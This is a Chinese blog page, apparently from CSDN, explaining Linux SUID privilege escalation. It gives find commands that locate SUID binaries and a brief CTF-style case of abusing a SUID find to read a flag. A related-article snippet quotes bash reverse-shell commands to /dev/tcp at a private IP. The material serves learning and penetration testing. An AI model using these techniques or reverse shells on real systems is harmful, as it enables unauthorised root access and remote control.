Linux-suid提权学习

最新推荐文章于 2024-07-25 15:50:18 发布
最新推荐文章于 2024-07-25 15:50:18 发布
阅读量350 收藏 1
点赞数 1
分类专栏: 内网渗透 文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43749601/article/details/120894097
版权

SUID提权是给予文件的一个一个特殊类型的文件权限。在 Linux/Unix中,当一个程序运行的时候, 程序将从登录用户处继承权限。SUID被定义为给予一个用户临时的(程序/文件)所有者的权限来运行一个程序/文件。用户在执行程序/文件/命令的时候,将获取文件所有者的权限以及所有者的UID和GID。

以下命令可以发现系统上运行的所有SUID可执行文件。

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} \;

其中的参数解释如下:

/表示从文件系统的顶部(根)开始并找到每个目录
-perm 表示搜索随后的权限
-u = s表示查找root用户拥有的文件
-type表示我们正在寻找的文件类型
f 表示常规文件,而不是目录或特殊文件
2表示该进程的第二个文件描述符,即stderr(标准错误)
>表示重定向
/ dev / null是一个特殊的文件系统对象,它将丢弃写入其中的所有内容。

实例

在一次内网渗透的过程中,拿到了主机的shell,但是却无法查看flag
在这里插入图片描述
然后我们使用suid进行提权。先找到具有root权限的suid文件 。
find / -perm -u=s -type f 2>/dev/null
在这里插入图片描述
找到root权限的suid的find,执行whoami命令。
在这里插入图片描述
提权得到flag
在这里插入图片描述

2021!
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux提权手法总结以及 Linux提权exp集合
02-22
而"linux提权exp大全.zip"则可能包含各种公开的提权exploit代码,供安全研究人员学习和测试系统防护措施。这些资源对于理解提权机制、提高安全意识和进行安全测试非常有价值。 总的来说,理解并掌握Linux提权的...
Linux溢出提权教程
03-08
通过学习本教程,读者将对Linux溢出提权有深入的理解,并能掌握相关技能,无论是用于防御还是进攻,都能在实际环境中更好地应对缓冲区溢出威胁。 不过,值得注意的是,此教程的压缩包文件列表中包含了一个名为"33....
Linux-suid提权
liver100day的博客
11-16 1371
ww
Linux提权--SUID提权&内核漏洞本地用户提权
金灰的博客
04-29 810
免责声明:本文仅做技术交流与学习,请不要乱搞破坏...
python提权_linux 提权-SUID提权
weixin_36332320的博客
01-13 1239
前言最近想着学习linux提权的一些姿势,这里简单分享学习SUID提权的一些知识点。权限解读先来父复习一下linux文件的权限分配。ls命令用来查看系统上面的文件、目录的权限。image.png字段的第一个字符表示对象的类型。- 代表文件d 代表目录l 代表链接c 代表字符型设备b 代表块设备n 代表网络设备之后是每三个字符为一组,每一组定义了3种访问权限。r 代表可读的w 代表可写的x 代表可执...
Linux利用Suid提权实验
qq_45813384的博客
02-20 1045
普通用户在执行特殊的Suid命令的时候(如:find、vim、less、more等),命令会自动申请管理员权限,并以管理员的权限去执行命令,当用户在这种拥有可以再执行命令的命令下(如:vim)执行特殊命令(如:!find 当前目录下的文件 -execbash-i >& /dev/tcp/192.168.0.105/8529 0>&1。bash-i >& /dev/tcp/192.168.0.105/2323 0>&1//反弹shell命令。ln-s-fbash /bin/sh //修改成bash。
【Try to Hack】Linux suid提权
开心星人的博客
06-20 637
SUID (Set owner User ID up on execution) 是给予文件的一个特殊类型的文件权限。在 Linux/Unix中,当一个程序运行的时候, 程序将从登录用户处继承权限。SUID被定义为给予一个用户临时的(程序/文件)所有者的权限来运行一个程序/文件。用户在执行程序/文件/命令的时候,将获取文件所有者的权限以及所有者的UID和GID。如果root给一个程序赋予了SUID权限,则普通用户在执行该程序过程中,是root权限。suid权限仅对二进制程序有效(binary program
权限提升-Linux提权-suid-脏牛内核
告白的博客
09-12 1146
0x00 提权简介 Linux提权相对于windows来说方法比较单一,主要提权方式为suid提权,内核提权,环境变量提权,计划任务提权,第三方服务提权,今天来记载一下关于suid提权以及内核脏牛提权,以及对目标linux信息收集的判断,以及漏洞探针。 0x01 Linux信息收集,漏洞探针 在获取到Linux主机的普通shell权限后,我们可以手动收集目标主机的相关信息,但是手工使用起来效率不高,这里推荐两款信息收集与漏洞探针的自动化脚本, 信息收集:LinEnum.sh 漏洞探针:linux-explo
LinuxSUID提权学习 - 从原理到使用
Reset
07-01 827
linux的文件有普通权限和特殊权限(三种)。普通权限一般为:rwx,分别为读写执行,对应的数字表示为421。三种特殊权限为:suid权限,sgid权限,sticky权限。其中suid权限作用于文件属主,sgid权限作用于属组上,sticky权限作用于other其他上。
网安学习-Linux提权
weixin_44770698的博客
07-23 1304
网安学习-Linux提权
简谈SUID提权
2401_84466336的博客
05-28 985
SUID (Set UID)是Linux中的一种特殊权限,其功能为用户运行某个程序时,如果该程序有SUID权限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID权限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义.​ 在执行过程中,调用者会暂时获得该文件的所有者权限,且该权限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果ls。
部分渗透提权文章
04-16
5. **提权实例**:在实际操作中,提权可能涉及多种技术,如利用SUID/SGID权限的程序,滥用sudo权限,或者通过系统服务漏洞进行提权。例如,CVE-2016-5195(Dirty COW)是一个著名的Linux内核漏洞,攻击者可以利用它...
red hat5提权
04-10
对于Red Hat 5这样的Linux发行版来说,提权是一个重要的议题,因为系统安全往往依赖于权限管理。在这个场景中,我们看到三个文件:`redhat5.avi`、`glibc-exp.sh` 和 `新建 文本文档.txt`,它们可能分别涉及视频教程...
第63天:权限提升-Linux脏牛内核漏洞&SUID&信息收集1
08-03
**案例2:Linux提权SUID配合脚本演示** SUID(Set-User-Id)是一种特殊权限,允许一个程序以文件所有者的身份运行,即使当前用户不是文件的所有者。这个案例展示了如何寻找和利用SUID程序进行提权。例如,通过`chmod...
Linux初学基本命令
最新发布
yuan20010401的博客
07-25 285
1、rm 文件名称 删除多个文件多个目录需要用空格 删除根目录(rm -rf /*)1、touch 文件名字 用于linux创建文件 创建多个目录需要用空格隔开。2、mkdir 目录名称 用于创建文件夹 创建多个嵌套文件夹需要用/隔开。1、cp 当前文件 其他目录名称 拷贝文件夹需要在最后 -r。退出不保存时按Esc+:q!1、ls 查看当前目录下面的文件或者文件夹。2、more 文件名称 查看文件更多内容。1、mv 原文件路径 目标文件路径。退出保存时按Esc + :wq。
Linux 常用命令分类及示例
简介
07-25 833
【代码】Linux 常用命令分类及示例。
2024-07-24 Linux C語言使用inotify进行文件变化检测
海月汐辰
07-24 335
inotify。
linux suid提权
03-16
这种特性可以被滥用来进行提权攻击,即攻击者通过执行一个SUID文件来获取root权限。在Linux系统中,SUID文件通常是一些系统工具,如passwd、ping等。攻击者可以通过利用这些工具的漏洞来获取root权限。为了防止SUID...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值